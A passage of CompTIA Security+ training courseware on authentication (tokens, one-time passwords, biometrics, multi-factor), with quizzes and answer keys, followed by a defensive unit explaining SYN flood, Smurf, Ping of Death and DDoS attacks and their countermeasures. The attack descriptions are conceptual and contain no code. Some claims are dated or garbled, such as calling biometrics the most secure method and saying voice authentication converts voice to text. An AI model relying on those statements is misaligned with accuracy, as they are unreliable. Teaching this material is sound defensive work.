                         by someone glancing over your shoulder.

                         Active tokens
                         Unlike a passive token, an active token does not emit or otherwise share its base token.
                         Instead, it actively creates another form of the base key—such as a one-time password
                         or an encrypted form of the base key—that is not subject to attack each time the owner
                         tries to authenticate.
2–20   CompTIA Security+ Certification

                  Originally these types of tokens required the user to read a value and type it into the
                  computer using their keyboard. Increasingly common are tokens that plug directly into
                  the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and
                  others that require a proprietary reader.
                  In particular, smart cards offer many advantages and are gaining in popularity. A smart
                  card is a plastic card, about the same size as a credit card, which has an embedded chip
                  with an integrated circuit that provides either memory or memory along with a
                  programmable microprocessor. Smart cards come in different forms—contact,
                  contactless, or hybrid—which can either be plugged into a device, or not, to work.
                  Depending on the amount of memory and the type of microprocessor they have, smart
                  cards can perform a multitude of functions. They can act as an employee badge, a credit
                  card, an electronic building key, or some other access-granting certificate. They can also
                  securely store personal information, such as biometric information, multiple
                  username/password combinations, and individual health records, digital certificates, and
                  private/public key infrastructure (PKI) keys.

                  One-time passwords
                  A one-time password is a password that is used only once for a very limited period of
                  time and then is no longer valid. If it is intercepted at any point though, it becomes
                  useless almost immediately. One-time passwords are typically generated using one of
                  two strategies: by employing counter-based or clock-based tokens.
                      • A counter-based token is an active token that produces one-time passwords by
                        combining the secret password with a counter that is synchronized with a
                        counter in a server. Normally, you obtain the fresh password by pressing a
                        button on the front of the token.
                      • A clock-based token is an active token that produces one-time passwords by
                        combining a secret password with an internal clock.
                  Both of these methods employ means to resynchronize the token’s counter or clock if
                  they vary too much from the corresponding server’s counter or clock.
                  Although one-time password technologies significantly reduce the risk of attacks—
                  relative to static password technologies—they are still open to certain kinds of attack,
                  such as phone line redirection attacks (which divert an authenticated connection to
                  capture transmitted data), IP address theft, and man-in-the-middle attacks.
                                                                             Authentication     2–21

Do it!   E-1:   Discussing tokens
          Questions and answers
          1 An active token does not emit or otherwise share its base token. True or false?

            True

          2 A passive token holds a microchip in order to perform a function or calculation on
            the base key information. True or false?

            False: This describes an active token.

          3 Explain the difference between counter-based and clock-based tokens.

            Counter-based tokens produce one-time passwords by combining the secret password with
            a counter that is synchronized with a counter in a server; clock-based tokens produce one-
            time passwords by combining a secret password with an internal clock that is synchronized
            with the server’s clock.
2–22      CompTIA Security+ Certification


Topic F: Biometrics
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.2    Recognize and be able to differentiate and explain the following methods of authentication
                              • Multi-factor
                              • Biometrics

                      5.1    Understand the application of the following concepts of physical security
                              • Access Control
                                  • Biometrics




                     Introducing biometric authentication
Explanation          Biometric authentication is based upon an individual’s unique physical or behavioral
                     characteristics. Physical characteristics that are commonly measured include
                     fingerprints, hand geometry, retinal and iris patterns, and facial characteristics.
                     Behavioral characteristics that are commonly measured include handwritten signatures
                     and voice.
                     Biometrics is the most secure form of authentication because it relies on measuring who
                     an individual is, rather than what they know or what they have. Furthermore, biometric
                     authentication is the most convenient type of authentication because the person need not
                     remember anything or carry anything with them.
                     This section examines how a biometric authentication system works, how each of the
                     physical and behavioral characteristics is measured, the strengths and weaknesses
                     associated with those measurements, and the general trends and issues associated with
                     biometric authentication as a whole.

                     Working of a biometric authentication system
                     The process by which a biometric authentication system works is outlined in the
                     following steps. The first four steps of this process are used to collect initial biometric
                     measurements of an individual. Steps five through eight in the following list correspond
                     to the authentication process that takes place when that individual needs to be
                     authenticated to access a restricted area, whether that area is a room in a building or a
                     computer/network resource.
                          1 Your identity is verified using acceptable forms of identification, such as a
                             driver’s license, passport, or company identity badge.
                          2 Your chosen biometric (fingerprint, iris features, handwritten signature, and so
                             on) needs to be scanned for the first time.
                          3 The biometric information must then be analyzed by a computer and put into an
                             electronic template.
                          4 The template is then stored in some kind of repository (a local repository, a
                             central repository, or a portable token such as a smart card).
                          5 When you wish to gain access to restricted areas of a building or computer
                             system, your chosen biometric must be scanned again.
                                                                   Authentication    2–23

    6 A computer then analyzes the biometric data and compares it to the data stored
      in the preexisting template.
    7 If the data provided by the current biometric scan sufficiently matches the data
      stored in the preexisting template, then the person is allowed access to the
      restricted area.
    8 Following the authenticate, authorize, and audit (AAA) model introduced at the
      beginning of this unit, a record of the authentication should be kept so that an
      access audit can be performed later.

False positives and false negatives
Although biometric authentication is generally considered the most accurate of all
authentication methods, it is not perfect. Unauthorized people are sometimes
authenticated when they should not be and authorized people might be rejected even
though they are actually who they claim to be.
As mentioned previously, during the biometric authentication process, a person’s
current biometric data is compared to a preexisting template of the original biometric
data. System administrators have the ability to set the degree to which the two should
match in order for a person to be authenticated by the system. System administrators
generally require higher degrees of similarity between the current and preexisting
biometric data in highly secure environments and lower degrees of similarity in
environments that are deemed less sensitive.

False positive results
When an unauthorized person is wrongly authenticated by biometric means, it is
referred to as a false positive result. The likelihood of this happening is increased when
the biometric data-matching standards are set too low. This can occur when the
administrator does not place the need for security above users’ general frustration at
having to repeatedly have their biometric data scanned when wanting to gain access to a
restricted area. A false positive result can also occur when there is a desire to move
many people through the scanning process in a short period of time, such as when
biometric authentication of fingerprints are used to allow many employees to enter the
building at the beginning of each work period.

False negative results
When an authorized person is not authenticated by biometric means and they are
actually who they claim to be and they have the authority to gain access to a restricted
area, it is referred to as a false negative result. This can occur when the biometric being
measured has changed for some reason since the initial scan was taken. For example, if
a man has grown or shaved off a beard, his current biometric data can differ greatly
from that which was gathered during the initial scan.
False negatives can result in lost productivity when employees cannot gain access to the
resources they need to perform their job duties. They can take up valuable time of
network administrators to rectify the problem, and finally, they cause a great deal of
frustration for the person who is authorized, but unable, to access certain crucial areas.
2–24   CompTIA Security+ Certification

                  Different kinds of biometrics
                  The following sections on physical and behavioral characteristics highlight what is
                  being measured during the various types of biometric authentication procedures and the
                  basic strengths and weaknesses of each.

                  Physical characteristics
                  Physical characteristics are those that are actually part of a person, such as the patterns
                  found on their fingerprint or iris, or the size of the various parts of their hand.
                  Fingerprints — A fingerprint scanner looks at the patterns found on the surface of a
                  fingertip. It is the oldest and most widely deployed biometric technology. Because of
                  this, prices of these devices (shown in Exhibit 2-4) are relatively low.




                  Exhibit 2-4: Fingerprint scanner by DigitalPersona

                  A fingerprint scanner can be deployed in a broad range of environments; it provides
                  flexibility and increased system accuracy by allowing users to enroll multiple fingers in
                  the template system. Its weaknesses include the fact that it might not work properly if
                  the fingertip or the device sensor is dirty, and that it is associated with criminality.
                  Hand geometry — Hand geometry authentication involves the measurement and
                  analysis of different hand measurements. This biometric is relatively easy to use;
                  moreover, simple integration into other systems and processes combined with an ability
                  to scan people quickly and easily, makes this a popular choice for many companies.
                  Relative to other biometrics, it has limited accuracy due to the relatively common
                  measurements of people’s hands. Furthermore, a hand-scanning device (shown in
                  Exhibit 2-5) is rather large and is unsuitable for cramped locations.
                                                                    Authentication    2–25




Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc.

Retinal scanning — Retinal scanning involves analyzing the layer of blood vessels
located at the back of the eye. This method is highly accurate, is very difficult to spoof,
and measures a stable physiological trait. It’s difficult to use because it requires the user
to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand
scanner, it is a relatively large device that would not work well in many situations. This
is very expensive technology and might be appropriate only in very high-security areas.




Exhibit 2-6: Retinal scanner by Eyedentify Inc.
2–26   CompTIA Security+ Certification

                  Iris scanning — Iris scanning involves analyzing the patterns of the colored part of the
                  eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and
                  does not require close contact between the eye and the scanner. Glasses can be worn
                  during an iris scan, unlike a retinal scan. Template matching rates for this technology
                  are very high; however, ease of use is still not very high compared to other methods.




                  Exhibit 2-7: Iris scanner by Panasonic Authenticam

                  Facial scanning — Facial scanning biometrics involves analyzing facial characteristics.
                  It is a unique biometric in that it does not require the cooperation of the scanned
                  individual: it can utilize almost any high-resolution image acquisition device such as a
                  still or motion camera. Although this discussion is primarily concerned with the use of
                  facial scanning to authenticate people trying to gain access to electronic resources, some
                  government agencies are increasingly interested in using publicly placed cameras and
                  driver license photos to help identify and track criminals and terrorists. Weaknesses in
                  this system include the fact that scanning capabilities can be reduced in low light, facial
                  features can change over time, and there are some concerns about the use of this
                  technology on unsuspecting people who do not know they are being scanned.

                  Behavioral characteristics
                  Behavioral characteristics are those that are exhibited by an individual, such as the way
                  a person signs her name or speaks a predetermined phrase, rather than characteristics
                  that are actually a part of the physical makeup of that person, such as a fingerprint or the
                  patterns of the iris or retina.
                  Handwritten signature verification analyzes the way people sign their name, such as
                  speed and pressure, as well as the final static shape of the signature itself. Signature
                  scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar
                  with it as a form of authentication, which means they might not feel as invaded using
                  this technology as they might with a fingerprint scan. A major weakness in this method
                  is not with the technology, but with the user. Most people do not sign their name in a
                  consistent manner, which can cause a high error rate when using this system to
                  authenticate. Ironically, the presence of a physical signature is often the rationale for not
                  adding more robust authentication methods.
                                                                  Authentication    2–27




Exhibit 2-8: Signature scanner by Interlink ePad VP9105

Voice authentication relies on voice-to-print technologies, not voice recognition. In this
process, your voice is transformed into text and compared to an original template.
Although this is fairly easy technology to implement because many computers already
have built-in microphones, the enrollment procedure is more complicated than other
biometrics, and background noise can interfere with the scanning, which can be
frustrating to the user.

General trends in biometrics
Although biometrics tends to be far more reliable in terms of authentication than other
means, it is generally too expensive for everyday use by individuals. A more promising
area of biometric usage, other than their traditional use in highly secure areas, is in
authenticating large numbers of people over a short period. This might become
especially useful when smart cards gain wider acceptance because people can hold their
own biometric information (something they generally prefer for privacy reasons) and
simply insert the card into a slot and use whatever biometric scanner is required to prove
their identity.
The use of biometrics to gain remote access to controlled areas is also expected to rise,
as users’ fear of identity theft during password authentication increases. Currently,
however, factors limiting dramatic growth in this area are the large number of vendors
and the different standards available. There needs to be more standardization in the
industry before many companies will be willing to invest in such new technologies.
Those companies that do invest will only require users who have access to very
sensitive information and applications to use biometric authentication.
Even though a biometric might be very difficult, if not impossible, to duplicate, steal, or
forge, the templates that hold biometric patterns that are compared to the actual person
during the time of authentication are still held in servers, which must be both physically
and electronically secure. If a hacker were able to gain access to the files that link
information about a user with their biometric, he or she would be able to copy their own
biometric templates into that system, give themselves authority to access sensitive areas,
or simply prevent others who should be allowed from doing so.
2–28   CompTIA Security+ Certification

                  Multi-factor authentication
                  There are three commonly recognized factors of authentication:
                      • Something you know, such as a password
                      • Something you have, such as a smart card
                      • Who you are (something about you), such as a biometric
                  Multi-factor authentication requires that an individual be positively identified using at
                  least one means of authentication from at least two of these three factors. When
                  choosing which methods and how many factors to use to authenticate a person, it’s
                  important to consider several implications of your choice. Each method of
                  authentication has certain strengths and weaknesses and each, appropriately, requires
                  people to exert a varying degree of time and effort to prove they are who they say they
                  are.
                  Adding additional factors of authenticity to your identification process decreases the
                  likelihood that an unauthorized person can compromise your electronic security system,
                  but it also increases the cost of maintaining that system. When deciding the degree of
                  assurance you need about a person’s identity, it is important to take into account both
                  the cost of having an unauthorized person compromise your electronic security and the
                  cost of having authorized people authenticate themselves before having access to the
                  data and services they need on your network. As the cost of compromising your
                  electronic security increases, so should your willingness to pay for that security,
                  whether through the purchase and upkeep of hardware and software or through the
                  expense of lost worker productivity.
                                                                                 Authentication   2–29

Do it!   F-1:   Understanding how biometrics work
          Questions and answers
          1 Name four features that are measured using biometrics.

            Answers might include:
            • Fingerprints
            • Hand geometry
            • Retinal and iris patterns
            • Facial characteristics
            • Handwritten signature

          2 Biometrics is the most secure form of authentication because it relies on
            measuring:
            A    What you know
            B    What you have
            C    Who you are

          3 Which of the following circumstances can result in a false negative?
            A    An authorized person is not authenticated
            B    An unauthorized person is wrongly authenticated
            C    An authorized person is authenticated but denied access to needed areas

          4 Identify some of the benefits and drawbacks of using retinal scanning.

            Benefits: Highly accurate, difficult to spoof, measures stable physiological trait

            Drawbacks: Difficult to use, relatively large device, expensive

          5 Which of the following biometrics measures behavioral characteristics?
            A    Handwritten signatures
            B    Iris scanning
            C    Fingerprints
            D    Voice
2–30      CompTIA Security+ Certification


Unit summary: Authentication
Topic A              In this topic you learned how the AAA model (authentication, authorization, and
                     accounting) is applied to achieve security goals. You learned some techniques for
                     creating strong passwords and storing them securely. You also learned how to modify
                     the Windows Server 2003 local security policy to harden the system against attacks.
Topic B              In this topic, you saw how Kerberos provides a secure and convenient way for
                     individuals to gain access to data and services through the use of session keys, tickets,
                     authenticators, authentication servers, ticket-granting tickets, ticket-granting servers,
                     and cross-realm authentication.
Topic C              In this topic, you learned about CHAP. You learned that CHAP provides a way for an
                     authenticator to authenticate a peer using an encrypted challenge-and-response
                     sequence.
Topic D              In this topic, you learned about private and public keys, digital certificates, and
                     digital signatures. You learned how private and public keys and digital certificates
                     authenticated by a trusted third party allow individuals and organizations to
                     communicate with each other in a secure way.
Topic E              In this topic, you learned how tokens allow individuals to use strong passwords when
                     logging on to a computer or network system.
Topic F              In this topic, you learned that biometrics provide the strongest means of individual
                     authentication because they rely on measurements of individual physical
                     characteristics and behaviors.

                     Review questions
                       1 Which of the following best describes authentication?
                         A The process of gaining access to resources
                         B The process of utilizing resources
                         C   The process of verifying the identification of a user
                         D The process of assigning permissions to users
                       2 What is the advantage in removing the name of the last user to log on?
                         A Allows users to share computers
                         B Requires users to remember their usernames
                         C   Requires a hacker to take an extra step when cracking passwords
                         D Hides the identity of the Windows Domain
                                                                    Authentication   2–31

3 Why is password length important?
  A Longer passwords are impossible to hack
  B   Longer passwords are harder to hack
  C Windows requires long passwords in a domain environment
  D Longer passwords can prevent password cracking programs from working
    properly
4 What is the password length recommended by most security professionals?
  A Six or more characters
  B Five or more characters
  C Eight or more characters
  D   Seven or more characters
5 Why are complex passwords important? (Choose all that apply.)
  A   Complex passwords are more difficult to crack
  B The complexity of passwords adds to the security of long passwords
  C Complex passwords are impossible to crack
  D   Complex passwords help users create strong passwords
6 Which of the following is considered a complex password? (Choose all that apply.)
  A   @1c4htj3

  B   Pa$$w0rd
  C ncdjszkjdnc
  D   Ajd649sg
7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or
  false?
  False: CHAP stands for Challenge Handshake Authentication Protocol.

8 Which of the following is not a part of the CHAP authentication process?
  A The authenticating server compares the value it receives from the peer with the
    hash value it expects by calculating its own expected hash value.
  B   The peer sends a challenge message to the authenticating server.

  C The peer creates a variable-length value using a one-way hash function on a
    fixed-length input message.
  D The authenticating server issues new challenge messages to the peer at random
    intervals throughout the communication session.
  E The CHAP authentication process starts after the authenticating server tells the
    peer that CHAP will be used.
2–32   CompTIA Security+ Certification

                    9 There are many different password conventions; what are basic rules to follow in
                      order to safeguard your passwords. (Choose all that apply.)
                      A   Passwords must be memorized. If they must be written down, the written records
                          must be locked up.
                      B   Each password you choose must be different from any other that you use.

                      C   Passwords must be at least six characters long, and probably longer, depending
                          on the size of the character set used.
                      D   Passwords must contain a mixture of letters (both uppercase and lowercase),
                          numbers, and other characters, such as %, !, or &.
                      E   Passwords must be changed periodically.

                  10 Kerberos assumes that none of the workstations or servers is physically secure and
                     that bad guys can position themselves between the user and the service being
                     sought. True or false?
                      False: Kerberos assumes that workstations, servers, and other devices that are connected to the
                      network are physically secure, and that there is no way for an attacker to gain access to a
                      password by establishing a position between the user and the service being sought.

                  11 In a Kerberos system, after a client has received a ticket from an authentication
                     server, it creates and adds an authentication that contains the user’s username and
                     time stamp. True or false?
                      True

                  12 The authenticator in a CHAP session must return either a “success” or “failure”
                     message to the sender once it has compared the expected hash value to the actual
                     hash value. True or false?
                      True

                  13 Explain the difference between symmetric and asymmetric encryption.
                      In symmetric encryption, one key both encrypts and decrypts a message, and in asymmetric
                      encryption, one key is used to encrypt the message and a different key is used to decrypt it.

                  14 An active token is a device that creates and shares modified or encrypted forms of
                     the base key. True or false?
                      True

                  15 One-time passwords are vulnerable to which of the following attacks?
                      A   Phone line redirection attacks

                      B   IP theft
                      C Dictionary attacks
                      D   Man-in-the-middle attacks
                                                                 Authentication    2–33

16 Which of the following is an example of a biometric? (Choose all that apply.)
    A Complex passwords
    B   Fingerprints

    C   Retinal scans

    D Smart cards
17 A biometric that involves the measurement and analysis of different hand
   characteristics and measurements is called:
    A Fingerprints
    B Facial recognition
    C   Hand geometry
    D All of the above
18 A biometric that involves analyzing voice characters and measurements is called:
    A Voice-to-print technology
    B Facial recognition
    C Sound technology
    D   Voice authentication


Independent practice activity
RunAs allows an administrator to log on with a standard user account and still run
administrative programs with administrative rights. Those rights are only applied to the
application, so viruses, worms, and Trojan Horses cannot access the network with
administrative privileges.
 1 Log on as User2.
 2 Click Start, then choose Control Panel.
 3 Double-click Local Security Policy. The User2 account should not be able to edit
   the Local Security Policy.
    Click OK.
 4 Right-click Local Security Policy. Click Run As….
 5 Select The following user. Enter the necessary administrator account information,
   and then click OK. You can now edit the local security policy.
 6 Which of the following is an advantage in using the RunAs command?
    A Allows users to bypass security without permission
    B Helps prevent the spread of viruses
    C Conserves resources for administrators
    D   Allows administrators to check e-mail and administer the network
2–34   CompTIA Security+ Certification

                    7 Which of the following is a disadvantage of the RunAs command? (Choose all that
                      apply.)
                      A Opens potential security holes
                      B   Allows users to install applications if they know the local administrator
                          password
                      C   Allows users to access administrative tools if they know the local administrator
                          password
                      D Allows users to change account permissions
                    8 How can you use RunAs on an existing shortcut?
                      A Hold down the Alt key and right-click the shortcut
                      B Right-click the shortcut
                      C   Hold down the Shift key and right-click the shortcut
                      D Hold down the Ctrl key and right-click the shortcut
                    9 What application should you not use RunAs to execute?
                      A A virus scanner
                      B An e-mail application
                      C   A word processor
                      D An auditing program
                  10 How can you prevent users from using RunAs?
                      A Delete the RunAs command
                      B   Disable the RunAs Service
                      C Disable the Server Service
                      D Delete the RunAs.dll file
                                                                  3–1


Unit 3
Attacks and malicious code
                        Unit time: 180 minutes

                        Complete this unit, and you’ll know how to:

                        A Recognize and defend against denial-of-
                           service (DoS) attacks, including SYN
                           flood, Smurf, Ping of Death, and
                           Distributed Denial of Service (DDoS)
                           attacks.

                        B Identify man-in-the-middle attacks.

                        C Recognize the major types of spoofing
                           attacks, including IP address spoofing,
                           ARP poisoning, Web spoofing, and DNS
                           spoofing.

                        D Discuss replay attacks.

                        E Explain TCP session hijacking.

                        F Detail various types of social-engineering
                           attacks, and explain why they can be
                           extremely damaging.

                        G List the major types of attacks used against
                           encrypted data.

                        H List the major types of attacks used against
                           encrypted data.
3–2       CompTIA Security+ Certification


Topic A: Denial of service attacks
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.3    Identify non-essential services and protocols and know what actions to take to reduce the risks of
                             those services and protocols

                      1.4    Recognize the following attacks and specify the appropriate actions to take to mitigate
                             vulnerability and risk
                              • DOS / DDOS (Denial of Service / Distributed Denial of Service)




                     Introducing denial of service attacks
Explanation          A denial-of-service (DoS) attack is any attack that consumes or disables resources in
                     order to interrupt services to legitimate users. The objective of the DoS attack is to
                     disrupt normal operations, but not destroy or steal data. This causes inconvenience at
                     best, diminished revenue and reputation for the victim at worst.
                     DoS attacks represent a major problem to security administrators because they take
                     numerous forms, are very common, and can be very costly to the attacked businesses. A
                     wide range of attack tools are available that allow malicious users to attack systems of
                     all sorts, and many of the tools have easy-to-use graphical user interfaces. A DoS
                     attacker need not have deep knowledge of networks or systems in order to launch a
                     damaging attack, because many of the attack tools require only basic computer
                     knowledge to operate.
                     Modes of attack include:
                       • Causing an application or operating system on a victim’s computer to crash,
                           making it unusable to legitimate users.
                       • Clogging network connections to a Web server with illegitimate traffic, slowing
                           the user’s traffic down, or making it completely unable to reach the Web site.
                       • Overloading the victim system by consuming resources such as disk space,
                           bandwidth, buffers, and queues. An overwhelmed system might offer its users
                           very sluggish performance or might be completely unusable.
                       • Using the normal behavior of a system to deny access to its users. For example,
                           an attacker could cause a user to be locked out of a given computer by
                           attempting to log on to the system with an incorrect password three times. Many
                           computer systems lock out a user’s account for a preset time period after the
                           third failed logon attempt.
                       • Remotely causing a network device to crash, temporarily making the network
                           inaccessible to attached devices.
                       • Overwhelming a DNS server with lookup requests until it runs out of memory
                           and crashes, making it impossible to resolve addresses for the domains it serves,
                           and thereby interrupting access to any Web pages within the domain.
                     Security administrators should be familiar with the more common DoS attacks in order
                     to secure their networks and systems from such attacks. A representative sampling of
                     attacks is presented in the following sections.
                                                                                  Attacks and malicious code       3–3

                            SYN flood
                            A SYN flood attack prevents users from accessing a target server by flooding it with
                            half-open TCP connections.
                            Normal TCP connections between two hosts are arranged with an exchange of three
                            packets.
                               1 The first packet is sent from the client to the server with the SYN flag set.
                               2 The server acknowledges the session by replying with a packet that has both the
                                   SYN and the ACK flags set (a SYN/ACK packet).
                               3 The client responds to the server with an ACK packet. The TCP session is
                                   completely established and the two hosts are able to exchange data.
                            If, for some reason, the client doesn’t complete the connection by sending the ACK
                            packet, the server waits a couple of minutes, giving the client plenty of time to respond,
                            before clearing the uncompleted connection from memory and making it available for
                            use by others. The TCP session setup process is shown in Exhibit 3-1.



If students question what
the abbreviations in the
Exhibit mean: SEQ is
the packet sequence
number, CTL is the
control flag, SYN is the
synchronize control flag,
and ACK is
acknowledgement. More
information about three-
way handshakes can be
found in RFC 793.



                            Exhibit 3-1: TCP three-way handshake

                            Although most computer systems can handle many established network connections,
                            they usually can handle only a handful of connections that are in the process of being
                            established (or half-open connections). This is because connections are usually set up in
                            such a short amount of time that there is no need for a long queue for half-open
                            connections.

                            Conducting SYN flood attacks
                            An attacker can render a machine unavailable to network users by filling the half-open
                            connections queue—without permitting the connections to be completed and moved into
                            the list of fully open connections. This is accomplished by flooding the server with SYN
                            packets that have a spoofed source address. The server responds with an SYN/ACK
                            packet to the fake source address, but never receives the ACK reply, which is needed to
                            complete the TCP connection. The server cannot accept any more TCP connections
                            until the half-open connections time-out, so legitimate users can be prevented from
                            reaching the server.
3–4   CompTIA Security+ Certification

                 Countermeasures
                 Many commercial firewall products have features to reduce the effect of SYN floods.
                 The firewall sits between the attacking client machine and the attacked server, so it has
                 the ability to withhold or insert packets into the data stream as necessary to thwart SYN
                 floods.
                 One strategy used by firewalls is to immediately respond to the server’s SYN/ACK
                 packet with an ACK that uses the spoofed IP address of the client, as shown in
                 Exhibit 3-2.
                 This permits the server to move the session out of the half-open connections queue. If
                 the connection is a legitimate one, the client shortly responds with its own ACK packet,
                 which the firewall can forward to the server with no negative impact. If the connection
                 is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall
                 can safely kill the TCP session by sending the server an RST (reset) packet.
                 This is just one example of how firewalls can mitigate the effect of SYN floods; every
                 firewall manufacturer has its own strategy. Other countermeasures include:
                     • Increase the size of the server’s half-open connection queue.
                     • Decrease the queue’s time-out period, limiting the number of half-open
                       connections from a single IP.
                     • Use network-based intrusion detection systems that can detect SYN floods and
                       notify administrators.




                 Exhibit 3-2: Defending against the SYN flood


                 SynAttackProtect
                 You can protect your server from SYN floods with the TCP/IP parameter
                 SynAttackProtect. This parameter is used to enable SYN flooding attack. A value of 1
                 enables this if the TcpMaxConnectResponseRetransmissions value is at least 2. This
                 protection detects SYN flooding and then reduces the time spent on server connection
                 requests that can't be acknowledged. This entry can be added to Windows Server 2003
                 through Regedit.
                                                    Attacks and malicious code      3–5

Do it!   A-1:   Protecting against SYN flood attacks
          Here’s how                       Here’s why
          1 Log on to the Windows Server   Setting the SynFloodAttack parameter in the
            2003 server as Administrator   Windows registry makes a Windows NT, 2000
                                           or Server 2003 network more resistant to SYN
                                           flood attacks.

          2 Click Start

          3 Choose Run…

            Enter regedit

            Click OK                       To open the Registry Editor window.

          4 Expand
            HKEY_LOCAL_MACHINE

          5 Expand SYSTEM

          6 Expand CurrentControlSet




          7 Expand Services

          8 Expand Tcpip

          9 Select Parameters

         10 Right-click Parameters

         11 Choose New, DWORD Value




            Enter SynAttackProtect
3–6   CompTIA Security+ Certification


                  12 Right-click SynAttackProtect       To start the process of changing the parameter
                                                        value.

                       Choose Modify

                  13 In the Value Data field, enter 1   A value of 1 enables the parameter.

                       Click OK

                  14 Close the Registry Editor window
                                                                  Attacks and malicious code    3–7

              Smurf
Explanation   Smurf is a non-OS specific attack that uses a third-party’s network segment to
              overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets.
              As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary
              network (preferably, with numerous hosts), and the victim (typically, a computer or
              router on the Internet).
                  1 The hacker sends a ping (echo-request) packet to the intermediary network’s
                      broadcast address. The packet’s source IP address is faked to be that of the
                      victim system.
                  2 The ping was sent to the broadcast address of the intermediary network, so every
                      host on that subnet replies to the victim’s IP address.
                  3 The third-party’s hosts unwittingly deluge the victim with ping packets.
              Using this technique, the hacker cannot only overwhelm the computer system receiving
              the flood of echo packets, but can also saturate the victim’s Internet connection with
              bogus traffic and therefore delay or prevent legitimate traffic from reaching its
              destination.




              Exhibit 3-3: Smurf attack

              Countermeasures
              Protective measures against Smurf attacks can be placed in the network or on individual
              hosts.
                  • Configure routers to drop ICMP messages from outside the network with a
                      destination of an internal broadcast or multicast address.
                  • Configure hosts to ignore echo requests directed to their subnet broadcast
                      address.
              Most current router and desktop operating systems have protection in place to guard
              against well-known Smurf attacks by default, but changes to the configuration or new
              modifications of the attack might make the network and hosts vulnerable.
3–8          CompTIA Security+ Certification

                           Ping of Death
                           There are a number of attacks that exploit some operating systems’ incorrect handling or
                           error checking of fragmented IP packets. The Ping of Death is a well-known exploit that
                           uses IP packet fragmentation techniques to crash remote systems. When first released,
                           this shockingly simple attack had the ability to crash any machine that could receive a
                           ping packet. All the attackers needed to use in this attack was the victim’s IP address!

                           Mode of attack
Explain the nature of      This common exploit misuses the way that large IP packets (or more specifically, ICMP
IP packets and the         packets, because the attack uses a ping) are transmitted across networks. The maximum
concept of the MTU.
You can explain an         size of an IP packet is 65,535 bytes, but packets that are large cannot be transmitted on
MTU by using a floppy      many network topologies. For example, the maximum transmission unit (MTU) for
disk analogy. If you       Ethernet—probably the most commonly used LAN topology—is only 1500 bytes. To
want to transfer 5MB       transmit a large IP packet across a LAN, hosts and routers fragment IP packets into
of information from one
computer to the other
                           smaller Ethernet frames, and then reassemble the fragments at the destination. Each
using a floppy disk,       fragment contains an offset value that tells the receiving host where to insert its data into
you will have to split     the reassembled packet.
the information up into
chunks small enough        In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the
for the floppy to handle   victim, fragment by fragment. With each fragment, the size of the reassembled ping
and then reassemble        grows to near the 65,535-byte size limit of the IP packet. When the final fragment
the data on the other
                           arrives, it’s offset value forces the packet to grow beyond the IP size limit, causing the
computer.
                           victim host to crash.

                           Countermeasures
                           What made this attack particularly problematic was that recent Windows operating
                           systems allowed the generation of nonstandard pings from the regular user command
                           line, but the same systems would die when presented with one of these packets. Most
                           manufacturers have now provided patches that make their systems invulnerable to the
                           Ping of Death and other types of IP fragmentation attacks.
                           Starting with Windows 2000, Microsoft has removed the ability to generate ICMP
                           packets of invalid size by setting the maximum packet size to 53,000 bytes.
                                                                  Attacks and malicious code        3–9

Do it!   A-2:   Discussing DoS attacks
          Questions and answers
          1 A SYN flood exploits the nature of the TCP three-way handshake. True or false?

            True

          2 The SYN attack inhibits services by which of the following?
            A      Flooding a host with ICMP messages
            B      Transmitting excessively large IP packets
            C      Filling the half-open connection queue with bogus connections
            D      Overwhelming a DNS server with lookup requests

          3 What are some ways to defend against Smurf attacks?
            • Set filters on firewalls and routers to drop ICMP messages.
            • Configure hosts to ignore echo requests directed to their subnet broadcast address.

          4 How can you defend against Ping of Death attacks?
            • Limit ICMP packet size.
            • Install the latest security patches on your clients and servers.
3–10      CompTIA Security+ Certification

                     Distributed Denial-of-Service attacks
Explanation          A distributed denial-of-service (DDoS) attack is a network attack where the attacker
                     manipulates multiple hosts to carry out a DoS attack on a target. It usually results in the
                     temporary loss of access to a given site and an associated loss in revenue and prestige
                     for the victim.
                     The tools are automated, so a script kiddie (a malicious person on the Internet who is
                     able to use automated attack tools but has limited technical understanding of how they
                     work) can execute DDoS attacks. They are easy to launch, are extremely effective, and
                     have become the tool of choice for malicious hackers targeting government and
                     business Internet sites.

                     Setting up DDoS attacks
                     As shown in Exhibit 3-4, the first step in setting up a DDoS assault is for the attacker to
                     compromise a machine to be used as a handler.




                     Exhibit 3-4: Distributed denial-of-service attack

                     This is typically a large machine with plenty of disk space and a fast Internet
                     connection, so the malicious hacker has the resources necessary to upload an exploit
                     toolkit. It’s important that the hacker go undetected on the handler machine, so hosts
                     with a large number of user accounts or inattentive system administrators are targets for
                     use as handlers.
                     Once the handler has been setup with the necessary software tools, it begins to use
                     automated scripts to scan large chunks of ISP address space (DSL and cable customers
                     making the best targets because of their bandwidth and constant connection) to find
                     hosts to use as agents, or zombies. The scripts used for this purpose generally target
                     specific, known vulnerabilities in Windows operating systems and can complete the task
                     of compromising each system and uploading the zombie software within a matter of
                     seconds. The software is transparent to the machine’s owner, as it is imperative to the
                     attacker that their tools go undetected.
                                                                                     Attacks and malicious code   3–11

                             Hundreds or thousands of zombies might be required to launch a successful DDoS
                             attack, because most major Web sites have sufficient bandwidth and server resources to
                             handle substantial amounts of network traffic. This is not an obstacle for the determined
                             script kiddie, as the ever increasing number of unprotected home PCs connected to the
                             Internet provides ample fodder for creating a large army of zombies.

                             Conducting DDoS attacks
                             The agent software on compromised hosts usually communicates with the handler
                             machine via Internet Relay Chat (IRC) connections. These hosts are automatically
                             logged on to an IRC channel where they passively wait for attack orders from the
                             handler machines. When the malicious hacker is ready to launch the attack, a command
                             is issued through the handler machine to the thousands of agents connected to the
                             channel.
                             Depending on the type of agent software installed, the attacker has a number of attack
                             types to choose from, as listed in the following table:

                              Tools                        Flooding or attack methods

If students are unfamiliar    Trin00                       UDP
with UDP explain that it
is a connectionless           Tribe flood network          UDP, ICMP, SYN Smurf
protocol often used for
network broadcast             Stacheldracht and variants   UDP, ICMP, SYN Smurf
